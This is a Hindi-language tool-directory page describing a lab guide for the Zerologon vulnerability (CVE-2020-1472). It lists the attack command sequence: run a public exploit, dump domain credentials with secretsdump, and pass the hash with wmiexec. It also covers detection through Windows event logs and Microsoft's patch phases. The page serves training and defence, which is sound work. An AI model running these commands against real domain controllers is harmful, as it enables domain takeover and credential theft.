Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Zerologon_CVE-2020-1472 — Zerologon भेद्यता (CVE-2020-1472) का Windows Server 2016 पर Kali Linux और Impacket टूल्स का उपयोग करके अनुकरण, पता लगाने और शमन करने के लिए चरण-दर-चरण प्रयोगशाला मार्गदर्शिका। | Kitploit
उपकरण/GitHubGitHub/jolynngsc/zerologon_cve-2020-1472
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubjolynngsc/zerologon_cve-2020-1472

Zerologon_CVE-2020-1472

Zerologon भेद्यता (CVE-2020-1472) का Windows Server 2016 पर Kali Linux और Impacket टूल्स का उपयोग करके अनुकरण, पता लगाने और शमन करने के लिए चरण-दर-चरण प्रयोगशाला मार्गदर्शिका।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
2 साल पहलेअभी तक समीक्षित नहीं

Zerologon_CVE-2020-1472

उद्देश्य

इस भेद्यता अनुसंधान का उद्देश्य विंडोज सर्वर 2016 पर काली लिनक्स के माध्यम से एक Zerologon का अनुकरण करने के लिए एक नियंत्रित वातावरण स्थापित करना था, जिसका उपयोग पहचान और शमन के लिए किया जा सके। मुख्य फोकस एक भेद्यता प्रवेश (penetration) करना और डेस्कटॉप के उपयोगकर्ता के रूप में लॉग इन किए बिना डेस्कटॉप को नियंत्रित करने की संभावना दिखाना था, साथ ही भेद्यता का पता लगाना और उसे कम करना था।

सीखे गए कौशल

  • विंडोज इवेंट व्यूअर्स की उन्नत समझ
  • काली लिनक्स और इम्पैकेट्स में दक्षता
  • जीरोलोगॉन (Zerologon) करने की क्षमता

उपयोग किए गए उपकरण

  • Zerologon कोड
  • Windows Server 2016
  • Kali Linux

जीरोलोगॉन (Zerologon) को लागू करने के चरण

Kali Linux

  1. sudo su करके रूट उपयोगकर्ता बनें
  2. git clone https://github.com/dirkjanm/CVE-2020-1472
  3. cd /home/kali/impacket/examples/CVE-2020-1472 (अपनी निर्देशिका के अनुसार निर्देशिका बदलें)
  4. /cve-2020-1472-exploit.py -n [NETBIOS] -t [IPaddress]
  5. secretsdump.py -no-pass -just-dc [NETBIOS/User]$@[IP adress]
  6. wmiexec.py [Domain/User@IP] - hashes [hash]
स्क्रीनशॉट 2023-03-25 पूर्वाह्न 10:47:33 बजे

जीरोलोगॉन (Zerologon) की पहचान करने के चरण

Windows

महत्वपूर्ण सुरक्षा सुविधा अक्षम करें

  1. इवेंट व्यूअर जांचें
  2. सर्वर मैनेजर के अंतर्गत, विंडोज लॉग्स, सुरक्षा चुनें और ईवेंट आईडी 4624 (उपयोगकर्ता लॉगऑन ईवेंट) देखें जीरोलोगॉन के संकेत
  • लॉग का विषय NULL SID नाम से होगा
  • इस लॉगऑन को प्रशासनिक अधिकार भी दिए जाने चाहिए। स्क्रीनशॉट 2023-02-13 रात्रि 10:11:13 बजे
  • आप लॉग 4742 (NT Authority हमलावर है) भी जांच सकते हैं स्क्रीनशॉट 2023-03-30 रात्रि 9:52:58 बजे

पैच करने के चरण

माइक्रोसॉफ्ट ने विंडोज सर्वर (2008, 2016 और 2019) की सुरक्षा के लिए उपलब्ध पैच विकसित किए हैं; यह योजना इस प्रकार थी। पहले चरण में, पहला पैच (अगस्त पैच) डाउनलोड करने पर, डोमेन गैर-अनुपालक डिवाइसों से अन्य जुड़े डिवाइसों की रक्षा कर सकता है; सभी जुड़े डिवाइसों को एक स्पष्ट अपवाद के साथ सुरक्षित करने का विकल्प होगा।

दूसरा पैच (अगले वर्ष का फरवरी पैच), प्रवर्तन चरण, जब स्थापित होता है, तो सभी विंडोज और गैर-विंडोज डिवाइसों को नेटलॉगॉन के साथ सुरक्षित रिमोट प्रक्रिया कॉल (Remote Procedure Call) का उपयोग करने के लिए बाध्य किया जाता है। या कुछ विश्वसनीय डिवाइसों को स्पष्ट रूप से अनुमति देने का विकल्प। मूल रूप से गैर-अनुपालक कंप्यूटर को डोमेन से बाहर निकाल दिया जाता है।

टूल डाउनलोड करें